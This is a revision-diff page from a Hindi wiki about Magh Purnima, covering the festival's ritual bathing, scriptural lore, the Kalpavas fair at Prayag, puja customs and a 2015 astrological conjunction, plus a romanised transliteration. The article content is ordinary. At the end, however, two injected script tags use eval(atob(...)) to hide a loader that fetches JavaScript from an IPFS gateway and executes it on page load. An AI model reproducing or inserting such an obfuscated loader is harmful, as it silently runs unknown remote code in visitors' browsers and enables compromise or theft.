Difference between revisions of "माघ पूर्णिमा"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 6: Line 6:
 
==पौराणिक प्रसंग==
 
==पौराणिक प्रसंग==
 
शास्त्रों में एक प्रसंग है कि "[[भरत (दशरथ पुत्र)|भरत]] ने [[कौशल्या]] से कहा कि 'यदि [[राम]] को वन भेजे जाने में उनकी किंचितमात्र भी सम्मति रही हो तो [[वैशाख]], [[कार्तिक]] और माघ पूर्णिमा के [[स्नान]] सुख से वो वंचित रहें। उन्हें निम्न गति प्राप्त हो।' यह सुनते ही कौशल्या ने भरत को गले से लगा लिया।" इस तथ्य से ही इन अक्षुण पुण्यदायक पर्व का लाभ उठाने का महत्त्व पता चलता है।<ref name="aa"/>
 
शास्त्रों में एक प्रसंग है कि "[[भरत (दशरथ पुत्र)|भरत]] ने [[कौशल्या]] से कहा कि 'यदि [[राम]] को वन भेजे जाने में उनकी किंचितमात्र भी सम्मति रही हो तो [[वैशाख]], [[कार्तिक]] और माघ पूर्णिमा के [[स्नान]] सुख से वो वंचित रहें। उन्हें निम्न गति प्राप्त हो।' यह सुनते ही कौशल्या ने भरत को गले से लगा लिया।" इस तथ्य से ही इन अक्षुण पुण्यदायक पर्व का लाभ उठाने का महत्त्व पता चलता है।<ref name="aa"/>
==माघ स्नान==
+
==माघ स्नान की महिमा==
'[[ब्रह्मवैवर्त पुराण]]' में कहा गया है कि माघी पूर्णिमा पर स्वयं [[विष्णु|भगवान विष्णु]] [[गंगाजल]] में निवास करते हैं, अत: इस पावन समय गंगाजल का स्पर्श मात्र भी स्वर्ग की प्राप्ति देता है। इसी प्रकार पुराणों में मान्यता है कि भगवान विष्णु व्रत, उपवास, दान से भी उतने प्रसन्न नहीं होते, जितना अधिक प्रसन्न माघ स्नान करने से होते हैं। इस दिन किए गए [[यज्ञ]], तप तथा दान का विशेष महत्त्व होता है। भगवान विष्णु की [[पूजा]] कि जाती है, भोजन, वस्त्र, गुड़, [[कपास]], [[घी]], लड्डु, [[फल]], अन्न आदि का दान करना पुण्यदायक माना जाता है। माघ पूर्णिमा में प्रात:काल सूर्योदय से पूर्व किसी पवित्र नदी या घर पर ही [[स्नान]] करके भगवान मधुसूदन की पूजा करनी चाहिए। माघ मास में काले तिलों से हवन और पितरों का तर्पण करना चाहिए। तिल के दान का इस माह में विशेष महत्त्व माना गया है।
+
[[संगम]] में माघ पूर्णिमा का [[स्नान]] एक प्रमुख स्नान है। इस दिन सूर्योदय से पूर्व [[जल]] में भगवान का तेज रहता है, जो पाप का शमन करता है। '[[निर्णयसिन्धु]]' में कहा गया है कि माघ मास के दौरान मनुष्य को कम से कम एक बार पवित्र नदी में स्नान करना चाहिए। भले पूरे माह स्नान के योग न बन सकें, लेकिन माघ पूर्णिमा के स्नान से स्वर्गलोक का उत्तराधिकारी बना जा सकता है। इस बात का उदाहरण इस [[श्लोक]] से मिलता है-
 +
 
 +
<blockquote>मासपर्यन्त स्नानासम्भवे तु त्रयहमेकाहं वा स्नायात्‌।</blockquote>
 +
 
 +
अर्थात् "जो लोग लंबे समय तक स्वर्गलोक का आनंद लेना चाहते हैं, उन्हें माघ मास में [[सूर्य]] के [[मकर राशि]] में स्थित होने पर अवश्य तीर्थ स्नान करना चाहिए।"
 +
 
 +
[[हिन्दू धर्म]] की मान्यताओं के अनुसार महाकुंभ में माघ पूर्णिमा का स्नान इसलिए भी अति महत्वपूर्ण माना जाता है, क्योंकि इस [[तिथि]] पर [[चंद्रमा]] अपने पूर्ण यौवन पर होता है। [[साधु]]-संतों का कहना है कि [[पूर्णिमा]] पर चंद्रमा की किरणें पूरी लौकिकता के साथ [[पृथ्वी]] पर पड़ती हैं। स्नान के बाद [[मानव शरीर]] पर उन किरणों के पड़ने से शांति की अनुभूति होती है और इसीलिए पूर्णिमा का स्नान महत्वपूर्ण है। माघ स्नान वैज्ञानिक दृष्टिकोण से भी महत्वपूर्ण है। [[माघ]] में ठंड खत्म होने की ओर रहती है तथा इसके साथ ही [[शिशिर ऋतु|शिशिर]] की शुरुआत होती है। [[ऋतु]] के बदलाव का स्वास्थ्य पर प्रतिकूल असर नहीं पड़े, इसलिए प्रतिदिन सुबह स्नान करने से शरीर को मजबूती मिलती है।
 +
 
 +
'[[ब्रह्मवैवर्तपुराण]]' में उल्लेख है कि माघी पूर्णिमा पर [[विष्णु|भगवान विष्णु]] [[गंगाजल]] में निवास करते हैं, अत: इस पावन समय गंगाजल का स्पर्शमात्र भी स्वर्ग की प्राप्ति देता है। इसी प्रकार [[पुराण|पुराणों]] में मान्यता है कि भगवान विष्णु व्रत, उपवास, दान से भी उतने प्रसन्न नहीं होते, जितना अधिक प्रसन्न माघ स्नान करने से होते हैं। [[महाभारत]] में एक जगह इस बात का उल्लेख करते हुए कहा गया है कि इन दिनों में अनेक तीर्थों का समागम होता है। वहीं '[[पद्मपुराण]]' में कहा गया है कि अन्य मास में जप, तप और दान से भगवान विष्णु उतने प्रसन्न नहीं होते, जितने कि वे माघ मास में स्नान करने से होते हैं। यही वजह है कि प्राचीन ग्रंथों में नारायण को पाने का आसान रास्ता माघ पूर्णिमा के पुण्य स्नान को बताया गया है। [[भृगु|भृगु ऋषि]] के सुझाव पर व्याघ्रमुख वाले विद्याधर और [[गौतम ऋषि]] द्वारा अभिशप्त [[इन्द्र]] भी माघ स्नान के सत्व द्वारा ही श्राप से मुक्त हुए थे। 'पद्मपुराण' के अनुसार माघ-स्नान से मनुष्य के शरीर में स्थित उपाताप जलकर भस्म हो जाते हैं।<ref>{{cite web |url= https://vinayakvaastutimes.wordpress.com/tag/%E0%A4%AE%E0%A4%BE%E0%A4%98-%E0%A4%AA%E0%A5%82%E0%A4%B0%E0%A5%8D%E0%A4%A3%E0%A4%BF%E0%A4%AE%E0%A4%BE/|title= जानिए की क्या हैं माघ पूर्णिमा और माघ पूर्णिमा का महत्व..???|accessmonthday= 30 जनवरी|accessyear= 2015|last= |first= |authorlink= |format= |publisher= विनायक वास्तु टाइम्स|language= हिन्दी}}</ref>
 
==महत्त्व==
 
==महत्त्व==
 
'माघ पूर्णिमा' को 'माघी पूर्णिमा' के नाम से भी संबोधित किया जाता है। इस [[पूर्णिमा]] के [[हिन्दू धर्म]] में कई महत्त्व बताये गए हैं-
 
'माघ पूर्णिमा' को 'माघी पूर्णिमा' के नाम से भी संबोधित किया जाता है। इस [[पूर्णिमा]] के [[हिन्दू धर्म]] में कई महत्त्व बताये गए हैं-
Line 16: Line 24:
 
====पूजन====
 
====पूजन====
 
माघ पूर्णिमा के अवसर पर [[सत्यनारायण जी की आरती|भगवान सत्यनारायण जी]] कि [[कथा]] की जाती है। भगवान विष्णु की पूजा में [[केला|केले]] के पत्ते व [[फल]], पंचामृत, सुपारी, [[पान]], [[तिल]],  मोली, रोली, कुमकुम, [[दूर्वा]] का उपयोग किया जाता है। सत्यनारायण की पूजा के लिए [[दूध]], [[शहद]], केला, [[गंगाजल]], [[तुलसी]] का पत्ता, मेवा मिलाकर पंचामृत तैयार किया जाता है। इसके साथ ही साथ आटे को भून कर उसमें चीनी मिलाकर चूरमे का प्रसाद बनाया जाता है और इस का भोग लगता है। सत्यनारायण की कथा के बाद उनका पूजन होता है। इसके बाद [[लक्ष्मी|देवी लक्ष्मी]], [[महादेव]] और [[ब्रह्मा|ब्रह्मा जी]] की आरती कि जाती है और चरणामृत लेकर प्रसाद सभी को दिया जाता है।<ref>{{cite web |url= http://astrobix.com/hindumarg/329-%E0%A4%A6%E0%A4%BE%E0%A4%A8_%E0%A4%AA%E0%A5%81%E0%A4%A3%E0%A5%8D%E0%A4%AF_%E0%A4%95%E0%A5%80_%E0%A4%AE%E0%A4%BE%E0%A4%98_%E0%A4%AA%E0%A5%82%E0%A4%B0%E0%A5%8D%E0%A4%A3%E0%A4%BF%E0%A4%AE%E0%A4%BE__Magnificence_of_Magh_Purnima__Magh_Purnima_2015.html|title= दान-पुण्य की माघ पूर्णिमा|accessmonthday= 30 जनवरी|accessyear= 2015|last= |first= |authorlink= |format= |publisher=हिन्दुमार्ग|language= हिन्दी}}</ref>
 
माघ पूर्णिमा के अवसर पर [[सत्यनारायण जी की आरती|भगवान सत्यनारायण जी]] कि [[कथा]] की जाती है। भगवान विष्णु की पूजा में [[केला|केले]] के पत्ते व [[फल]], पंचामृत, सुपारी, [[पान]], [[तिल]],  मोली, रोली, कुमकुम, [[दूर्वा]] का उपयोग किया जाता है। सत्यनारायण की पूजा के लिए [[दूध]], [[शहद]], केला, [[गंगाजल]], [[तुलसी]] का पत्ता, मेवा मिलाकर पंचामृत तैयार किया जाता है। इसके साथ ही साथ आटे को भून कर उसमें चीनी मिलाकर चूरमे का प्रसाद बनाया जाता है और इस का भोग लगता है। सत्यनारायण की कथा के बाद उनका पूजन होता है। इसके बाद [[लक्ष्मी|देवी लक्ष्मी]], [[महादेव]] और [[ब्रह्मा|ब्रह्मा जी]] की आरती कि जाती है और चरणामृत लेकर प्रसाद सभी को दिया जाता है।<ref>{{cite web |url= http://astrobix.com/hindumarg/329-%E0%A4%A6%E0%A4%BE%E0%A4%A8_%E0%A4%AA%E0%A5%81%E0%A4%A3%E0%A5%8D%E0%A4%AF_%E0%A4%95%E0%A5%80_%E0%A4%AE%E0%A4%BE%E0%A4%98_%E0%A4%AA%E0%A5%82%E0%A4%B0%E0%A5%8D%E0%A4%A3%E0%A4%BF%E0%A4%AE%E0%A4%BE__Magnificence_of_Magh_Purnima__Magh_Purnima_2015.html|title= दान-पुण्य की माघ पूर्णिमा|accessmonthday= 30 जनवरी|accessyear= 2015|last= |first= |authorlink= |format= |publisher=हिन्दुमार्ग|language= हिन्दी}}</ref>
 +
==मेलों का आयोजन==
 +
प्रतिवर्ष [[माघ|माघ माह]] के समय [[प्रयाग]] ([[इलाहाबाद]]) में मेला लगता है, जो '[[कल्पवास]]' कहलाता है। प्रयाग में इस अवधि में कल्पवास बिताने की परंपरा सदियों से चली आ रही है, जिसका समापन माघी पूर्णिमा के स्नान के साथ होता है। इस दौरान देश के सभी भागों से आए अनेक श्रद्धालु यहां संगम क्षेत्र में स्नान कर [[धर्म]], कर्म के कार्य करते हैं। यह कल्पवास पूरे माघ माह तक चलता है, जो माघ माह की पूर्णिमा को संपन्न होता है। माघ पूर्णिमा के दिन श्रद्धालु [[स्नान]], दान, [[पूजा]]-पाठ, [[यज्ञ]] आदि करते हैं। माघ पूर्णिमा के दिन स्नान करने वाले पर भगवान विष्णु कि असीम कृपा रहती है। सुख-सौभाग्य, धन-संतान कि प्राप्ति होती है। माघ स्नान पुण्यशाली होता है।
 
==माघ पूर्णिमा-2015==
 
==माघ पूर्णिमा-2015==
 
[[वर्ष]] 2015 में [[3 फ़रवरी]] के दिन पड़ने वाली माघ पूर्णिमा को दुर्लभ संयोग बन रहा है। छह साल बाद फिर से माघ पूर्णिमा पर [[पुष्य नक्षत्र]] और रवि योग का त्रिवेणी संयोग बना है। इस दिन लाखों लोग तीर्थ स्थलों पर पवित्र नदियों में डुबकिया लगाएंगे। 'ललिता' और 'रविदास जयंती' भी होगी और [[होली]] के एक [[माह]] पहले ही होली का डांडा गली, चौराहों पर गाड़ा जाएगा। ज्योतिषियों के अनुसार 3 फ़रवरी, [[मंगलवार]] को माघ पूर्णिमा दिवस पर्यंत रहेगी। पुष्य नक्षत्र सुबह 7 से रात 8 बजे तक 13 घंटे रहेगा। मंगलकारी रवि योग भी सूर्योदय से दोपहर 12.37 तक होगा। इस दिन 'माघ स्नान' का समापन होता है। मान्यता है कि इस दिन [[देवता]] भी [[स्नान]] के लिए धरती पर आते हैं। माघ पू्‌र्णिमा, पुष्य नक्षत्र और रवि योग का त्रिवेणी संयोग 6 साल बाद बन रहा है। इससे पहले यह संयोग [[2009]] में बना था। माघ पूर्णिमा के दिन पुष्य नक्षत्र का आना मंगलकारी योग है। पुष्य नक्षत्र में [[चंद्रमा]] [[कर्क राशि]] में स्थित होता है। इस दिन किए गए कार्य में सफलता प्राप्त होती है।<ref>{{cite web |url= http://www.palpalindia.com/2015/01/29/indore-mp-magh-purnima-special-occasion-astrologically-news-hindi-84324.html|title= तीन फ़रवरी माघ पूर्णिमा पर बन रहा दुर्लभ संयोग|accessmonthday= 30 जनवरी|accessyear= 2015|last= |first= |authorlink= |format= |publisher=पल-पल इण्डिया|language= हिन्दी}}</ref>
 
[[वर्ष]] 2015 में [[3 फ़रवरी]] के दिन पड़ने वाली माघ पूर्णिमा को दुर्लभ संयोग बन रहा है। छह साल बाद फिर से माघ पूर्णिमा पर [[पुष्य नक्षत्र]] और रवि योग का त्रिवेणी संयोग बना है। इस दिन लाखों लोग तीर्थ स्थलों पर पवित्र नदियों में डुबकिया लगाएंगे। 'ललिता' और 'रविदास जयंती' भी होगी और [[होली]] के एक [[माह]] पहले ही होली का डांडा गली, चौराहों पर गाड़ा जाएगा। ज्योतिषियों के अनुसार 3 फ़रवरी, [[मंगलवार]] को माघ पूर्णिमा दिवस पर्यंत रहेगी। पुष्य नक्षत्र सुबह 7 से रात 8 बजे तक 13 घंटे रहेगा। मंगलकारी रवि योग भी सूर्योदय से दोपहर 12.37 तक होगा। इस दिन 'माघ स्नान' का समापन होता है। मान्यता है कि इस दिन [[देवता]] भी [[स्नान]] के लिए धरती पर आते हैं। माघ पू्‌र्णिमा, पुष्य नक्षत्र और रवि योग का त्रिवेणी संयोग 6 साल बाद बन रहा है। इससे पहले यह संयोग [[2009]] में बना था। माघ पूर्णिमा के दिन पुष्य नक्षत्र का आना मंगलकारी योग है। पुष्य नक्षत्र में [[चंद्रमा]] [[कर्क राशि]] में स्थित होता है। इस दिन किए गए कार्य में सफलता प्राप्त होती है।<ref>{{cite web |url= http://www.palpalindia.com/2015/01/29/indore-mp-magh-purnima-special-occasion-astrologically-news-hindi-84324.html|title= तीन फ़रवरी माघ पूर्णिमा पर बन रहा दुर्लभ संयोग|accessmonthday= 30 जनवरी|accessyear= 2015|last= |first= |authorlink= |format= |publisher=पल-पल इण्डिया|language= हिन्दी}}</ref>

Revision as of 10:11, 30 January 2015

magh poornima ya maghi poornima hindoo dharm mean b da hi dharmik mahattv bataya gaya hai. vaise to har poornima ka apana alag-alag mahatmy hota hai, lekin magh poornima ki bat sabase alag hai. is din sangam (prayag) ki ret par snan-dhyan karane se manokamanaean poorn to hoti hi haian, sath hi moksh ki prapti bhi hoti hai. magh nakshatr ke nam par 'magh poornima' ki utpatti hoti hai. magh mah mean devata-pitaragan sadrish hote haian. pitriganoan ki shreshthata ki avadharana aur shreshthata sarvavidit hai. pitaroan ke lie tarpan bhi hazaroan sal se chala a raha hai.[1] is din suvarn, til, kambal, pustakean, panchaang, kapas ke vastr aur annadi dan karane se sukrity milata hai.

dharmik manyata

magh mah ke bare mean kahate haian ki in dinoan devata prithvi par ate haian. prayag mean snan-dan adi karate haian. soory makar rashi mean a jata hai. devata manushy roop dharan karake bhajan-satsang adi karate haian. magh poornima ke din sabhi devi-devata aantim bar snan karake apane lokoan ko prasthan karate haian. natijatan isi din se sangam tat par ganga, yamuna evan sarasvati ki jalarashiyoan ka star kam hone lagata hai. manyata hai ki is din anekoan tirth, nadi-samudr adi mean pratah snan, soory arghy, jap-tap dan adi se sabhi daihik, daivik evan bhautik tapoan se mukti mil jati hai. shastr kahate haian ki yadi magh poornima ke din pushy nakshatr ho to is din ka puny akshun ho jata hai.[2]

kalpavas ki poornata

'magh poornima' kalpavas ki poornata ka parv hai. ek mah ki tapasya is tithi ko samapt ho jati hai. kalpavasi apane gharoan ko laut jate haian. svabhavik hai ki sankalp ki sanpoorti ka santosh evan parijanoan se milane ki utsukata unake hriday ke utsah ka sanchar hai. isiliye yah snan parv anand aur utsah ka parv ban jata hai.

pauranik prasang

shastroan mean ek prasang hai ki "bharat ne kaushalya se kaha ki 'yadi ram ko van bheje jane mean unaki kianchitamatr bhi sammati rahi ho to vaishakh, kartik aur magh poornima ke snan sukh se vo vanchit rahean. unhean nimn gati prapt ho.' yah sunate hi kaushalya ne bharat ko gale se laga liya." is tathy se hi in akshun punyadayak parv ka labh uthane ka mahattv pata chalata hai.[2]

magh snan ki mahima

sangam mean magh poornima ka snan ek pramukh snan hai. is din sooryoday se poorv jal mean bhagavan ka tej rahata hai, jo pap ka shaman karata hai. 'nirnayasindhu' mean kaha gaya hai ki magh mas ke dauran manushy ko kam se kam ek bar pavitr nadi mean snan karana chahie. bhale poore mah snan ke yog n ban sakean, lekin magh poornima ke snan se svargalok ka uttaradhikari bana ja sakata hai. is bat ka udaharan is shlok se milata hai-

masaparyant snanasambhave tu trayahamekahan va snayath‌.

arthath "jo log lanbe samay tak svargalok ka anand lena chahate haian, unhean magh mas mean soory ke makar rashi mean sthit hone par avashy tirth snan karana chahie."

hindoo dharm ki manyataoan ke anusar mahakuanbh mean magh poornima ka snan isalie bhi ati mahatvapoorn mana jata hai, kyoanki is tithi par chandrama apane poorn yauvan par hota hai. sadhu-santoan ka kahana hai ki poornima par chandrama ki kiranean poori laukikata ke sath prithvi par p dati haian. snan ke bad manav sharir par un kiranoan ke p dane se shaanti ki anubhooti hoti hai aur isilie poornima ka snan mahatvapoorn hai. magh snan vaijnanik drishtikon se bhi mahatvapoorn hai. magh mean thand khatm hone ki or rahati hai tatha isake sath hi shishir ki shuruat hoti hai. rritu ke badalav ka svasthy par pratikool asar nahian p de, isalie pratidin subah snan karane se sharir ko majabooti milati hai.

'brahmavaivartapuran' mean ullekh hai ki maghi poornima par bhagavan vishnu gangajal mean nivas karate haian, at: is pavan samay gangajal ka sparshamatr bhi svarg ki prapti deta hai. isi prakar puranoan mean manyata hai ki bhagavan vishnu vrat, upavas, dan se bhi utane prasann nahian hote, jitana adhik prasann magh snan karane se hote haian. mahabharat mean ek jagah is bat ka ullekh karate hue kaha gaya hai ki in dinoan mean anek tirthoan ka samagam hota hai. vahian 'padmapuran' mean kaha gaya hai ki any mas mean jap, tap aur dan se bhagavan vishnu utane prasann nahian hote, jitane ki ve magh mas mean snan karane se hote haian. yahi vajah hai ki prachin granthoan mean narayan ko pane ka asan rasta magh poornima ke puny snan ko bataya gaya hai. bhrigu rrishi ke sujhav par vyaghramukh vale vidyadhar aur gautam rrishi dvara abhishapt indr bhi magh snan ke satv dvara hi shrap se mukt hue the. 'padmapuran' ke anusar magh-snan se manushy ke sharir mean sthit upatap jalakar bhasm ho jate haian.[3]

mahattv

'magh poornima' ko 'maghi poornima' ke nam se bhi sanbodhit kiya jata hai. is poornima ke hindoo dharm mean kee mahattv bataye ge haian-

  • is avasar par ganga mean snan karane se pap eanv santap ka nash hota hai tatha man evan atma ko shudvata prapt hoti hai.
  • kisi bhi vyakti dvara is din kiya gaya mahasnan samast rogoan ko shaant karane vala hai.
  • 'om namah bhagavate vasudevay namah' ka jap karate hue snan v dan karana chahie.
  • is din se hi holi ka daanda ga da jata hai.

poojan

magh poornima ke avasar par bhagavan satyanarayan ji ki katha ki jati hai. bhagavan vishnu ki pooja mean kele ke patte v phal, panchamrit, supari, pan, til, moli, roli, kumakum, doorva ka upayog kiya jata hai. satyanarayan ki pooja ke lie doodh, shahad, kela, gangajal, tulasi ka patta, meva milakar panchamrit taiyar kiya jata hai. isake sath hi sath ate ko bhoon kar usamean chini milakar choorame ka prasad banaya jata hai aur is ka bhog lagata hai. satyanarayan ki katha ke bad unaka poojan hota hai. isake bad devi lakshmi, mahadev aur brahma ji ki arati ki jati hai aur charanamrit lekar prasad sabhi ko diya jata hai.[4]

meloan ka ayojan

prativarsh magh mah ke samay prayag (ilahabad) mean mela lagata hai, jo 'kalpavas' kahalata hai. prayag mean is avadhi mean kalpavas bitane ki paranpara sadiyoan se chali a rahi hai, jisaka samapan maghi poornima ke snan ke sath hota hai. is dauran desh ke sabhi bhagoan se ae anek shraddhalu yahaan sangam kshetr mean snan kar dharm, karm ke kary karate haian. yah kalpavas poore magh mah tak chalata hai, jo magh mah ki poornima ko sanpann hota hai. magh poornima ke din shraddhalu snan, dan, pooja-path, yajn adi karate haian. magh poornima ke din snan karane vale par bhagavan vishnu ki asim kripa rahati hai. sukh-saubhagy, dhan-santan ki prapti hoti hai. magh snan punyashali hota hai.

magh poornima-2015

varsh 2015 mean 3 faravari ke din p dane vali magh poornima ko durlabh sanyog ban raha hai. chhah sal bad phir se magh poornima par pushy nakshatr aur ravi yog ka triveni sanyog bana hai. is din lakhoan log tirth sthaloan par pavitr nadiyoan mean dubakiya lagaeange. 'lalita' aur 'ravidas jayanti' bhi hogi aur holi ke ek mah pahale hi holi ka daanda gali, chaurahoan par ga da jaega. jyotishiyoan ke anusar 3 faravari, mangalavar ko magh poornima divas paryant rahegi. pushy nakshatr subah 7 se rat 8 baje tak 13 ghante rahega. mangalakari ravi yog bhi sooryoday se dopahar 12.37 tak hoga. is din 'magh snan' ka samapan hota hai. manyata hai ki is din devata bhi snan ke lie dharati par ate haian. magh pooh‌rnima, pushy nakshatr aur ravi yog ka triveni sanyog 6 sal bad ban raha hai. isase pahale yah sanyog 2009 mean bana tha. magh poornima ke din pushy nakshatr ka ana mangalakari yog hai. pushy nakshatr mean chandrama kark rashi mean sthit hota hai. is din kie ge kary mean saphalata prapt hoti hai.[5]


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

  1. puny pradayini magh poornima (hindi) jagaran. abhigaman tithi: 30 janavari, 2015.
  2. 2.0 2.1 pushy nakshatr ke sath magh poornima ka sanyog janie mahatv (hindi) amar ujala.k aaum. abhigaman tithi: 30 janavari, 2015.
  3. janie ki kya haian magh poornima aur magh poornima ka mahatv..??? (hindi) vinayak vastu taims. abhigaman tithi: 30 janavari, 2015.
  4. dan-puny ki magh poornima (hindi) hindumarg. abhigaman tithi: 30 janavari, 2015.
  5. tin faravari magh poornima par ban raha durlabh sanyog (hindi) pal-pal indiya. abhigaman tithi: 30 janavari, 2015.

bahari k diyaan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>